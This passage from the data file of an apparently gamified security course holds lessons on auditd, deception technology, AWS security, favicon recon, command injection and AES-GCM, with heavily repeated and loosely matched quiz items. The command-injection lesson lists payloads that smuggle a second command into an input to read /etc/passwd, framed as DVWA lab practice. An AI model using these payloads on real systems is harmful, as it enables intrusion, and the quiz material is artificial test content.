example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"defense-audit-logging","cat":"Defense & Blue Team","title":"Linux Audit Framework (auditd)","diff":1,"xp":100,"intro":"Track every file access, command execution, and system call.","sections":[{"type":"text","content":"auditd logs system calls. Watch sensitive files, track privilege escalation attempts, and record command execution for forensics."},{"type":"code","lang":"bash","content":"# Install\napt install auditd\n# Watch a sensitive file\nauditctl -w /etc/shadow -p rwa -k shadow_access\n# Track execve (command execution)\nauditctl -a always,exit -F arch=b64 -S execve -k commands\n# Track privilege escalation\nauditctl -w /usr/bin/sudo -p x -k priv_esc\n# Search logs\nausearch -k shadow_access\nausearch -k commands --start today"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"auditd operates at which level?","opts":["Application","Kernel (system call)","Network","User space only"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"defense-deception","cat":"Defense & Blue Team","title":"Deception Technology","diff":2,"xp":150,"intro":"Fill your network with fake assets that only attackers would touch.","sections":[{"type":"text","content":"Deception goes beyond honeypots: fake credentials in memory, fake DNS entries, fake file shares, fake database entries. Any interaction = alert."},{"type":"code","lang":"bash","content":"# Deception layers:\n# 1. Network: fake hosts responding on unused IPs\n# 2. Credentials: honey tokens in LSASS, fake entries in password managers\n# 3. Files: canary documents in file shares\n# 4. DNS: fake internal hostnames (dc02.internal, vpn-backup.internal)\n# 5. Data: fake credit card numbers in databases (triggers PCI alert if exfiltrated)\n# 6. Breadcrumbs: fake SSH keys, .bash_history with fake commands"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Deception technology creates...","opts":["Stronger encryption","Fake assets that alert on any interaction","Faster firewalls","Better passwords"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cloud-guardduty","cat":"Cloud & Container","title":"AWS GuardDuty Threat Detection","diff":1,"xp":100,"intro":"AI-powered threat detection that analyzes CloudTrail, VPC Flow, and DNS.","sections":[{"type":"text","content":"GuardDuty detects credential compromise, cryptocurrency mining, data exfiltration, and reconnaissance \u2014 without deploying agents."},{"type":"code","lang":"bash","content":"# Enable GuardDuty\naws guardduty create-detector --enable\n# List findings\naws guardduty list-findings --detector-id abc123\n# Common finding types:\n# UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration\n# CryptoCurrency:EC2/BitcoinTool.B\n# Recon:EC2/PortProbeUnprotectedPort\n# Trojan:EC2/DriveBySourceTraffic"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"GuardDuty analyzes...","opts":["Source code","CloudTrail, VPC Flow Logs, and DNS","Container images","IAM policies"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-multi-account","cat":"Cloud & Container","title":"Multi-Account Cloud Security","diff":2,"xp":150,"intro":"Isolate workloads across AWS accounts for blast radius reduction.","sections":[{"type":"text","content":"Use AWS Organizations with SCPs, dedicated accounts per environment (prod/dev/security), and centralized logging in a security account."},{"type":"code","lang":"bash","content":"# AWS Organizations SCP: deny disabling CloudTrail\n{\n  \"Version\": \"2012-10-17\",\n  \"Statement\": [{\n    \"Sid\": \"ProtectCloudTrail\",\n    \"Effect\": \"Deny\",\n    \"Action\": [\"cloudtrail:StopLogging\",\"cloudtrail:DeleteTrail\"],\n    \"Resource\": \"*\"\n  }]\n}\n# Account structure:\n# Management account (billing, SCPs)\n# Security account (GuardDuty, CloudTrail aggregation)\n# Prod account, Dev account, Sandbox account"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"SCPs (Service Control Policies) are...","opts":["IAM policies","Organization-wide permission boundaries","Security groups","Network ACLs"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"recon-favicon-hash","cat":"Reconnaissance","title":"Favicon Hash Fingerprinting","diff":1,"xp":75,"intro":"Hash a favicon and search Shodan for related infrastructure.","sections":[{"type":"text","content":"Hash a website's favicon with MurmurHash and search Shodan to find servers running the same software."},{"type":"code","lang":"bash","content":"python3 -c \"import mmh3,requests,codecs; r=requests.get('https://target.com/favicon.ico'); print(mmh3.hash(codecs.lookup('base64').encode(r.content)[0]))\"\nshodan search http.favicon.hash:HASH"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Favicon hashing finds...","opts":["Vulnerabilities","Related infrastructure","Credentials","DNS records"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-command-injection","cat":"Web Application","title":"OS Command Injection","diff":1,"xp":100,"intro":"When user input reaches a system shell, inject commands.","sections":[{"type":"text","content":"If the app passes input to system() or exec(), shell metacharacters let you run arbitrary commands."},{"type":"code","lang":"bash","content":"# Payloads: ; id | id & id $(id) `id`\n127.0.0.1; cat /etc/passwd\n127.0.0.1 | whoami"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Command injection uses...","opts":["SQL keywords","Shell metacharacters like ; | &","HTML tags","HTTP headers"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"crypto-aes-gcm","cat":"Cryptography","title":"AES-GCM Authenticated Encryption","diff":2,"xp":150,"intro":"Encrypt and authenticate in one operation \u2014 the TLS 1.3 standard.","sections":[{"type":"text","content":"GCM combines CTR encryption with GHASH authentication. It detects tampering, unlike CBC."},{"type":"code","lang":"python","content":"from Crypto.Cipher import AES\nimport os\nkey = os.urandom(32)\ncipher = AES.new(key, AES.MODE_GCM, nonce=os.urandom(12))\nct, tag = cipher.encrypt_and_digest(b'secret')"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"AES-GCM provides...","opts":["Only encryption","Only authentication","Both encryption and authentication","Key exchange"],"ans":2},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately 